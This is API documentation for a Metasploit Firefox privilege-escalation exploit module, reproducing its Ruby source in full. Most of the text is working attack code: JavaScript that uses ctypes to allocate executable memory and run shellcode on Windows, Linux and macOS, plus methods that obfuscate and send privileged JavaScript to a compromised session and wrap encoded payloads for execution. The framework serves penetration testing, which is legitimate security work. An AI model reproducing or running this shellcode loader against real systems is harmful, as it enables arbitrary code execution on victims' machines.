Module: Msf::Exploit::Remote::FirefoxPrivilegeEscalation
- Includes:
- JSObfu
- Included in:
- FirefoxAddonGenerator
- Defined in:
- lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
Instance Method Summary collapse
-
#exec_shellcode_source ⇒ String
Puts the shellcode into memory, adds X flag, and calls it The js function throws on error.
-
#js_exec(js, timeout = 30) ⇒ String
Sends the
jscode to the remote session, which executes it in Firefox’s privileged javascript context. -
#js_target? ⇒ Boolean
The user has selected a javascript (non-native) target.
-
#run_payload ⇒ String
For a javascript payload, this simply returns the payload source For a native payload, this calls the correct methods to alloc RWX memory and execute shellcode.
Methods included from JSObfu
Instance Method Details
#exec_shellcode_source ⇒ String
Puts the shellcode into memory, adds X flag, and calls it The js function throws on error
34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 |
# File 'lib/msf/core/exploit/remote/firefox_privilege_escalation.rb', line 34 def exec_shellcode_source %Q| var execShellcode = function(shellcode, bytes) { Components.utils.import("resource://gre/modules/ctypes.jsm"); var execPosix = function() { var RWX = 7, ANON_PRIVATE = 4098; Components.utils.import("resource://gre/modules/ctypes.jsm"); var LIBS = [ "/usr/lib/libSystem.B.dylib", "libc.so.6", "libc.so" ]; var i, lib; for (i in LIBS) { try { lib = ctypes.open(LIBS[i]); break; } catch (e) {} } if (!lib) throw new Error("Could not find lib in ["+LIBS+"]"); var mmap = lib.declare('mmap', ctypes.default_abi, /* calling convention */ ctypes.voidptr_t, /* return type */ ctypes.voidptr_t, /* address (NULL here) */ ctypes.size_t, /* num bytes */ ctypes.int, /* PROT_READ OR PROT_WRITE OR PROT_EXEC */ ctypes.int, /* MAP_ANONYMOUS OR MAP_PRIVATE */ ctypes.int, /* fd (0) */ ctypes.int /* offset (0) */ ); var memcpy = lib.declare('memcpy', ctypes.default_abi, /* calling convention */ ctypes.voidptr_t, /* return type */ ctypes.voidptr_t, /* dest */ ctypes.voidptr_t, /* src */ ctypes.size_t /* size to copy */ ); var fork = lib.declare('fork', ctypes.default_abi, /* calling convention */ ctypes.int /* return type */ ); var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0); var cstr = ctypes.jschar.array()(shellcode); memcpy(buff, cstr, bytes); /* there is probably a better way to do this */ var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/); if (!m) throw new Error("Could not find address of buffer."); if (fork() == 0) { ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))(); } }; var execWindows = function() { var RWX = 0x40, ANON_PRIVATE = 0x1000; var Kernel32 = ctypes.open("Kernel32.dll"); var VirtualAlloc = Kernel32.declare('VirtualAlloc', ctypes.winapi_abi, /* calling convention */ ctypes.voidptr_t, /* return type */ ctypes.voidptr_t, /* start address (NULL here) */ ctypes.size_t, /* num bytes */ ctypes.unsigned_long, /* alloc type */ ctypes.unsigned_long /* protection flags */ ); var RtlMoveMemory = Kernel32.declare('RtlMoveMemory', ctypes.winapi_abi, /* calling convention */ ctypes.voidptr_t, /* return type */ ctypes.voidptr_t, /* dest */ ctypes.voidptr_t, /* src */ ctypes.size_t /* size to copy */ ); var CreateThread = Kernel32.declare('CreateThread', ctypes.winapi_abi, /* calling convention */ ctypes.voidptr_t, /* return type */ ctypes.voidptr_t, /* lpThreadAttributes */ ctypes.voidptr_t, /* dwStackSize */ ctypes.voidptr_t, /* lpStartAddress copy */ ctypes.voidptr_t, /* lpParameter */ ctypes.voidptr_t, /* dwCreationFlags */ ctypes.voidptr_t /* lpThreadId */ ); var buff = VirtualAlloc(null, shellcode.length, ANON_PRIVATE, RWX); var cstr = ctypes.jschar.array()(shellcode); RtlMoveMemory(buff, cstr, bytes); var m = buff.toString().match(/"0x([0-9a-fA-F]+)"/); if (!m) throw new Error("Could not find address of buffer."); var fn = ctypes.FunctionType(ctypes.winapi_abi, ctypes.void_t).ptr(parseInt(m[1], 16)); CreateThread(null, null, fn, null, null, null); }; var i, errs = [], fns = [execWindows, execPosix]; for (i in fns) { try { fns[i](shellcode); return true; } catch(e) { errs.push(e.message); } } throw new Error("All methods failed. Exceptions encountered:\\n["+errs+"]"); }; | end |
#js_exec(js, timeout = 30) ⇒ String
Sends the js code to the remote session, which executes it in Firefox’s privileged javascript context. The code will be obfuscated if the JsObfuscate datastore option is set to 1 or higher.
23 24 25 26 27 28 29 |
# File 'lib/msf/core/exploit/remote/firefox_privilege_escalation.rb', line 23 def js_exec(js, timeout=30) print_status "Running the privileged javascript..." token = "[[#{Rex::Text.rand_text_alpha(8)}]]" js = js_obfuscate(js) session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}") session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout) end |
#js_target? ⇒ Boolean
Returns the user has selected a javascript (non-native) target.
152 153 154 155 156 157 158 |
# File 'lib/msf/core/exploit/remote/firefox_privilege_escalation.rb', line 152 def js_target? if target.arch target.arch[0] == ARCH_FIREFOX else false end end |
#run_payload ⇒ String
For a javascript payload, this simply returns the payload source For a native payload, this calls the correct methods to alloc RWX memory and execute shellcode
142 143 144 145 146 147 148 149 |
# File 'lib/msf/core/exploit/remote/firefox_privilege_escalation.rb', line 142 def run_payload return payload.encoded if js_target? %Q| #{exec_shellcode_source} var sc = unescape("#{Rex::Text.to_unescape(payload.encoded)}"); execShellcode(sc, #{payload.encoded.bytes.to_a.length}); | end |